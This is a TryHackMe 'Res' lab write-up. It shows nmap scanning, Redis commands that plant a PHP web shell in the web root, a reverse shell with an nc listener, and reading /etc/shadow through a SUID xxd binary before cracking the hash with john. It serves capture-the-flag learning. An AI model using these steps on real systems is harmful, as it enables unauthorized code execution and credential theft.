Post

TryHackMe - Res

Posted Updated
By Nasrallah Baadi 3 min read

Description

Hello hackers, I hope you are doing well. We are doing Res from TryHackMe. We find a misconfigured databases that we exploit to get rce on the target and then a reverse shell. Then we find a binary with suid bit giving us the ability to read any file we want which leads to getting a root shell.

Enumeration

nmap

We start a nmap scan using the following command: sudo nmap -sC -sV -T4 {target_IP}.

  • -sC: run all the default scripts.

  • -sV: Find the version of services running on the target.

  • -T4: Aggressive scan to provide faster results.

1
2
3
4
5
6
7

Nmap scan report for 10.10.184.71
Host is up (0.085s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)

We found port 80 open running Apache web server. Let’s scan all port this time : sudo nmap -p- --min-rate 5000 -sV -T4 {Target_ip}

1
2
3
4
5
6

Nmap scan report for 10.10.184.71
Host is up (0.080s latency).
Not shown: 65404 closed tcp ports (reset), 129 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
6379/tcp open  redis   Redis key-value store 6.0.7

We found another port running redis version 6.0.7

Redis

We can connect to redis using the following command: redis -h {Target_ip}

1
2

$ redis-cli -h 10.10.184.71
10.10.184.71:6379>

We can run the command info which will give up statistics about the redis server.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

10.10.184.71:6379> info                                                       
# Server                        
redis_version:6.0.7                                                           
redis_git_sha1:00000000         
redis_git_dirty:0                                                             
redis_build_id:5c906d046e45ec07                                               
redis_mode:standalone                                                         
os:Linux 4.4.0-189-generic x86_64                                             
arch_bits:64                                                                  
multiplexing_api:epoll                                                        
atomicvar_api:atomic-builtin                                                  
gcc_version:5.4.0
process_id:618           
run_id:3e2c7a6de54cd12ab2794d6990908d5416bb48d3
tcp_port:6379                
uptime_in_seconds:1579        
uptime_in_days:0        
hz:10                         
configured_hz:10               
lru_clock:989304          
executable:/home/vianka/redis-stable/src/redis-server
config_file:/home/vianka/redis-stable/redis.conf
io_threads_active:0 

[** SNIP **]

# Keyspace
10.10.184.71:6379>

The section that can be useful for us is Keyspace which provides us with the databases and the keys available on the server. Unfortunately, we couldn’t find anything in this server.

We can see that the redis server is located in the home directory of a user named vianka, but it’s not very useful for us.

Searching on the internet for ways to get RCE using redis i found the following article: http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html that describes how to get a php webshell with the following example.

1
2
3
4
5
6
7
8
9

root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test "<?php phpinfo(); ?>"
OK
10.85.0.52:6379> save
OK

We need to make some changes in the commands above.

We know that the web server running on the target is Apache, so we need to change the directory to /var/www/html.

We can leave the dbfilename as it is.

We change the php code to the following one that would give us remote code execution on the target.

1

<?php system($_GET['cmd']); ?>

Let’s do it.

1
2
3
4
5
6
7
8
9

10.10.184.71:6379> config set dir /var/www/html
OK
10.10.184.71:6379> config set dbfilename redis.php
OK
10.10.184.71:6379> set test "<?php system($_GET['cmd']); ?>"
OK
10.10.184.71:6379> save
OK
10.10.184.71:6379>

Now if we can go to http://{target_ip/redis.php?cmd=} to execute commands.

We have code execution now.

Foothold

To get a reverse shell, i uploaded Pentest Monkey’s php code to the target.

Don’t forget to change the ip address in the code to your tun0 ip.

Now we setup a listener with nc -lvnp 1234 and request the shell.php file.

We’re in.

Privilege Escalation

I uploaded linpeas to the target and run it.

We find that xxd has suid bit, let’s check GTFOBins.

We can run the following command to read any file in the system.

1

xxd {filename} | xxd -r

To read the shadow file for example, run xxd /etc/shadow | xxd -r

We have vianka’s hash, we can crack it using john.

We can now change user to vianka and then to root.

Thank you for taking the time to read my write-up, I hope you have learned something from this. If you have any questions or comments, please feel free to reach out to me. See you in the next hack :).

TryHackMe
tryhackme linux redis suid easy crack john
This post is licensed under CC BY 4.0 by the author.